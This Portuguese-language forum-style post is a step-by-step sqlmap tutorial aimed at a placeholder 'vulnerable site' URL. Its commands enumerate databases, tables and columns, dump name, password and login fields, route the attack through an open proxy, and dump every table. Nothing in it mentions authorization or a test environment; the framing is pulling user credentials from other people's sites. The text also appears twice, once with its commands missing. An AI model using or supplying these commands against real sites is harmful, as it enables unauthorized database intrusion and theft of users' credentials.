Bom pessoas...
Venho neste post, mostra-lhes, como usar, o básico, do programa SQLMAP.
Primeiro, se você usa o BackTrack, o programa já vem instalado, se você usa outra distribuição de Linux, é fácil de instalar. Por exemplo no Ubuntu:
apt-get install sqlmap
Pronto. Agora que você tem o programa, você necessita saber como mexer com ele. Então aí vai um tutorial bem básico...
1º - Como executar o SQLMAP?
Bem, então agora você já sabe como executar o programa, agora vamos ao 2º passo.
2º - Como inserir a URL para teste?
Lembre-se: Na URL, você deve colocar a URL vulnerável, não a página principal do site!
Agora, por enquanto, se você der o comando para o programa fazer algo, não acontecerá nada. Agora vamos para a parte, que realmente vamos ver como o programa funciona.
3º - Descobrindo o Banner do DB do site.
Pronto, será retornado a versão do Banco de Dados que o site utiliza.
4º - Encontrando os Bancos de Dados do site.
Pronto, já descobrimos quais os Bancos de Dados que o site têm. Mas agora, tenho que explorar um por um?
Não, o SQLMAP têm um parâmetro, que acha o Banco de Dados usado no site.
5º - Achando o Banco de Dados que o site usa.
Pronto, será retornado o Banco de Dados principal do site. É o que iremos explorar.
6º - Achando as tabelas do Banco.
Explicação:
-D -- É o parâmetro que indica o Banco de Dados selecionado. No caso, o meu Banco se chama db.
--tables -- É o parâmetro que indica ao programa, para puxar as tabelas do Banco de Dados.
Sabemos então, que a ordem de um Banco de Dados é esta:
BANCO
TABELAS
COLUNAS
CAMPOS
Agora que já achamos, e escolhemos a tabela desejada, vamos puxar as colunas.
7º - Achando as colunas da tabela
Explicação:
-T -- É o parâmetro que indica ao programa, que ele deve selecionar tal tabela. No meu caso tabela.
--columns -- É o parâmetro que indica ao programa que, ele deve puxar as colunas de tal tabela.
8º - Retirando os dados das colunas.
Explicação:
-C -- É o parâmetro que indica ao programa, que ele deve puxar os dados dos campos nome, senha, login. Coloque sempre os nomes dos campos entre aspas simples, separando-os com vírgula.
--dump -- É o parâmetro que indica ao programa, que ele deve puxar os dados dos campos, e mostrar para os usuários.
EXTRAS:
1º - Utilizando um proxy.
Sempre coloque o parâmetro do proxy por último.
2º - Puxando tudo de todas as tabelas.
Bom pessoas, neste post é só. Espero que tenham gostado.
Obrigado!
Venho neste post, mostra-lhes, como usar, o básico, do programa SQLMAP.
Primeiro, se você usa o BackTrack, o programa já vem instalado, se você usa outra distribuição de Linux, é fácil de instalar. Por exemplo no Ubuntu:
apt-get install sqlmap
Pronto. Agora que você tem o programa, você necessita saber como mexer com ele. Então aí vai um tutorial bem básico...
1º - Como executar o SQLMAP?
python sqlmap.py PARÂMETROS
2º - Como inserir a URL para teste?
python sqlmap.py --url "http://www.sitevul.com/pagina?id=4"
Agora, por enquanto, se você der o comando para o programa fazer algo, não acontecerá nada. Agora vamos para a parte, que realmente vamos ver como o programa funciona.
3º - Descobrindo o Banner do DB do site.
python sqlmap.py --url "http://www.sitevul.com/pagina?id=4" -b
4º - Encontrando os Bancos de Dados do site.
python sqlmap.py --url "http://www.sitevul.com/pagina?id=4" --dbs
Pronto, já descobrimos quais os Bancos de Dados que o site têm. Mas agora, tenho que explorar um por um?
Não, o SQLMAP têm um parâmetro, que acha o Banco de Dados usado no site.
5º - Achando o Banco de Dados que o site usa.
python sqlmap.py --url "http://www.sitevul.com/pagina?id=4" --current-db
6º - Achando as tabelas do Banco.
python sqlmap.py --url "http://www.sitevul.com/pagina?id=4" -D db --tables
-D -- É o parâmetro que indica o Banco de Dados selecionado. No caso, o meu Banco se chama db.
--tables -- É o parâmetro que indica ao programa, para puxar as tabelas do Banco de Dados.
Sabemos então, que a ordem de um Banco de Dados é esta:
BANCO
TABELAS
COLUNAS
CAMPOS
Agora que já achamos, e escolhemos a tabela desejada, vamos puxar as colunas.
7º - Achando as colunas da tabela
python sqlmap.py --url "http://www.sitevul.com/pagina?id=4" -D db -T tabela --columns
-T -- É o parâmetro que indica ao programa, que ele deve selecionar tal tabela. No meu caso tabela.
--columns -- É o parâmetro que indica ao programa que, ele deve puxar as colunas de tal tabela.
8º - Retirando os dados das colunas.
python sqlmap.py --url "http://www.sitevul.com/pagina?id=4" -D db -T tabela -C 'nome,senha,login' --dump
-C -- É o parâmetro que indica ao programa, que ele deve puxar os dados dos campos nome, senha, login. Coloque sempre os nomes dos campos entre aspas simples, separando-os com vírgula.
--dump -- É o parâmetro que indica ao programa, que ele deve puxar os dados dos campos, e mostrar para os usuários.
EXTRAS:
1º - Utilizando um proxy.
python sqlmap.py --url "http://www.sitevul.com/pagina?id=4" -D db -T tabela -C 'nome,senha,login' --dump --proxy=http://173.203.80.108:80
2º - Puxando tudo de todas as tabelas.
python sqlmap.py --url "http://www.sitevul.com/pagina?id=4" -D db --tables --dump-all
Obrigado!